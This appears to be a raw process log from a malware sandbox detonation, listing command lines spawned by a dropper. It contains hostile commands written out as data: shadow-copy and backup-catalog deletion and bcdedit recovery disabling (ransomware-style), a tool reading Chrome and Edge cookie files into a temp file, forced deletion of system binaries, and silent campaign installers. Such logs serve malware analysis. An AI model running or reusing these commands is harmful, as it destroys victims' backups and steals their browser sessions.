C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\rsjdqsdl.om4\GcleanerEU.exe /eufive & exit
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Users\Admin\AppData\Local\Temp\rsjdqsdl.om4\GcleanerEU.exe
C:\Users\Admin\AppData\Local\Temp\rsjdqsdl.om4\GcleanerEU.exe /eufive
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c taskkill /im MSBuild.exe /f & timeout /t 6 & del /f /q "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe" & del C:\ProgramData\*.dll & exit
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\1s23tdqz.kf1\installer.exe /qn CAMPAIGN="654" & exit
C:\Users\Admin\AppData\Local\Temp\1s23tdqz.kf1\installer.exe
C:\Users\Admin\AppData\Local\Temp\1s23tdqz.kf1\installer.exe /qn CAMPAIGN="654"
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 696 -p 1544 -ip 1544
C:\Windows\SysWOW64\taskkill.exe
taskkill /im MSBuild.exe /f
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\drwjbzx4.rcm\ufgaa.exe & exit
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1544 -s 296
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
C:\Windows\SysWOW64\timeout.exe
timeout /t 6
C:\Windows\syswow64\MsiExec.exe
C:\Windows\syswow64\MsiExec.exe -Embedding 8F0D675169118B68B9501C7E97A33C40 C
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C wmic shadowcopy delete
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\csrss.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\csrss.exe" -agent 0
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C vssadmin delete shadows /all /quiet
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C wbadmin delete catalog -quiet
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C bcdedit /set {default} bootstatuspolicy ignoreallfailures
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C bcdedit /set {default} recoveryenabled no
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\l2gkxalb.x5m\anyname.exe & exit
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\j1bqu4qh.gyv\gcleaner.exe /mixfive & exit
C:\Windows\SysWOW64\Wbem\WMIC.exe
wmic shadowcopy delete
C:\Windows\SysWOW64\msiexec.exe
"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Y.msi" /qn CAMPAIGN=654 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\1s23tdqz.kf1\installer.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\1s23tdqz.kf1\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1629403836 /qn CAMPAIGN=""654"" " CAMPAIGN="654"
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\l2gkxalb.x5m\anyname.exe
C:\Users\Admin\AppData\Local\Temp\l2gkxalb.x5m\anyname.exe
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\j1bqu4qh.gyv\gcleaner.exe
C:\Users\Admin\AppData\Local\Temp\j1bqu4qh.gyv\gcleaner.exe /mixfive
C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
C:\Users\Admin\AppData\Local\Temp\l2gkxalb.x5m\anyname.exe
"C:\Users\Admin\AppData\Local\Temp\l2gkxalb.x5m\anyname.exe" -q
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 712 -p 7144 -ip 7144
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 7144 -s 292
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Windows\system32\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
C:\Windows\SysWOW64\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 576 -p 5776 -ip 5776
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5776 -s 460
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2056,14794003825300065771,17924417010707861376,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1680 /prefetch:2
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Program Files (x86)\MaskVPN\MaskVPNUpdate.exe
MaskVPNUpdate.exe /silent
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\aipackagechainer.exe
"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\aipackagechainer.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\dq5n5a33.3ba\autosubplayer.exe /S & exit
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\RequiredApplication_1\Cleaner_Installation.exe
"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\RequiredApplication_1\Cleaner_Installation.exe" -silent=1 -CID=717 -SID=717 -submn=default
C:\Windows\SysWOW64\notepad.exe
notepad.exe
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" "--anbfs"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" -NonInteractive -NoLogo -ExecutionPolicy AllSigned -Command "C:\Users\Admin\AppData\Local\Temp\AI_18AC.ps1 -paths 'C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\file_deleter.ps1','C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\aipackagechainer.exe','C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites' -retry_count 10"
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Cleaner\User Data" /prefetch:7 --monitor-self --monitor-self-argument=--type=crashpad-handler "--monitor-self-argument=--user-data-dir=C:\Users\Admin\AppData\Local\Cleaner\User Data" --monitor-self-argument=/prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Cleaner\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Cleaner\User Data" --annotation=plat=Win64 --annotation=prod=Cleaner --annotation=ver=0.0.13 --initial-client-data=0x21c,0x220,0x224,0x1f8,0x228,0x7ffa1c28dec0,0x7ffa1c28ded0,0x7ffa1c28dee0
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Cleaner\User Data" /prefetch:7 --no-periodic-tasks --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Cleaner\User Data\Crashpad" --annotation=plat=Win64 --annotation=prod=Cleaner --annotation=ver=0.0.13 --initial-client-data=0x13c,0x140,0x144,0x118,0x148,0x7ff655529e70,0x7ff655529e80,0x7ff655529e90
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1580,481587518537795703,4740324273599934189,131072 --lang=en-US --service-sandbox-type=utility --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw4292_1281950882" --mojo-platform-channel-handle=2116 /prefetch:8
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1580,481587518537795703,4740324273599934189,131072 --lang=en-US --service-sandbox-type=network --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw4292_1281950882" --mojo-platform-channel-handle=2100 /prefetch:8
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=gpu-process --field-trial-handle=1580,481587518537795703,4740324273599934189,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw4292_1281950882" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1592 /prefetch:2
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Cleaner\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1580,481587518537795703,4740324273599934189,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw4292_1281950882" --nwjs --extension-process --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --mojo-platform-channel-handle=2424 /prefetch:1
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Cleaner\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1580,481587518537795703,4740324273599934189,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw4292_1281950882" --nwjs --extension-process --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --mojo-platform-channel-handle=2340 /prefetch:1
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=gpu-process --field-trial-handle=1580,481587518537795703,4740324273599934189,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw4292_1281950882" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=3168 /prefetch:2
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1580,481587518537795703,4740324273599934189,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw4292_1281950882" --mojo-platform-channel-handle=3616 /prefetch:8
C:\Users\Admin\AppData\Local\Temp\11111.exe
C:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
C:\Windows\system32\compattelrunner.exe
C:\Windows\system32\compattelrunner.exe -m:aeinv.dll -f:UpdateSoftwareInventoryW
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1580,481587518537795703,4740324273599934189,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw4292_1281950882" --mojo-platform-channel-handle=3260 /prefetch:8
C:\Users\Admin\AppData\Local\Temp\11111.exe
C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1580,481587518537795703,4740324273599934189,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw4292_1281950882" --mojo-platform-channel-handle=3356 /prefetch:8
C:\Users\Admin\AppData\Local\Temp\11111.exe
C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
C:\Users\Admin\AppData\Local\Temp\11111.exe
C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1580,481587518537795703,4740324273599934189,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw4292_1281950882" --mojo-platform-channel-handle=2204 /prefetch:8
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1580,481587518537795703,4740324273599934189,131072 --lang=en-US --service-sandbox-type=utility --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw4292_1281950882" --mojo-platform-channel-handle=3368 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.profitabletrustednetwork.com/b1fsmdd9m?key=7e872dab99d78bffc4aa0c1e6b062dad
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffa20f146f8,0x7ffa20f14708,0x7ffa20f14718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2056,14794003825300065771,17924417010707861376,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1264 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2056,14794003825300065771,17924417010707861376,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6580 /prefetch:1
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 448 -p 1684 -ip 1684
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 1684 -s 2196
C:\Windows\system32\sihost.exe
sihost.exe
C:\Windows\explorer.exe
explorer.exe /LOADSAVEDWINDOWS
C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\SearchHost.exe
"C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\SearchHost.exe" -ServerName:CortanaUI.AppXstmwaab17q5s3y22tp6apqz7a45vwv65.mca
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?zoneid=1851483
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffa20f146f8,0x7ffa20f14708,0x7ffa20f14718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2056,14794003825300065771,17924417010707861376,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3320 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2056,14794003825300065771,17924417010707861376,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2296 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2056,14794003825300065771,17924417010707861376,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6956 /prefetch:1
C:\Users\Admin\AppData\Local\Temp\11111.exe
C:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2056,14794003825300065771,17924417010707861376,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7012 /prefetch:1
C:\Users\Admin\AppData\Local\Temp\11111.exe
C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
C:\Users\Admin\AppData\Local\Temp\11111.exe
C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
C:\Users\Admin\AppData\Local\Temp\11111.exe
C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?zoneid=1851513
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
